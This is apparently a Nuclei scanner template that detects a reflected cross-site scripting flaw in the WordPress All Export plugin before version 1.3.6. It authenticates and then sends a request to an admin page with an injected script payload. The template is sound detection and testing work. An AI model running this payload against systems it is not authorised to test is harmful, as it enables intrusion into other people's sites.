50 lines
1.5 KiB
YAML
50 lines
1.5 KiB
YAML
id: wp-all-export-xss
|
|
|
|
info:
|
|
name: WordPress All Export <1.3.6 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cwe-id: CWE-80
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
- |
|
|
GET /wp-admin/admin.php?page=pmxe-admin-manage&a"><script>alert(1)</script> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'manage&a\"><script>alert(1)</script>">'
|
|
- 'Manage Exports'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022026475099a26a6c17ea65a0d4d6652ffdebdac734f330dbeb31d9b42692c38fac022021dbbf51d9bb675fa59a5fd0e97a71a5674cd68daabf33d00916e07157955243:922c64590222798bb761d5b6d8e72950 |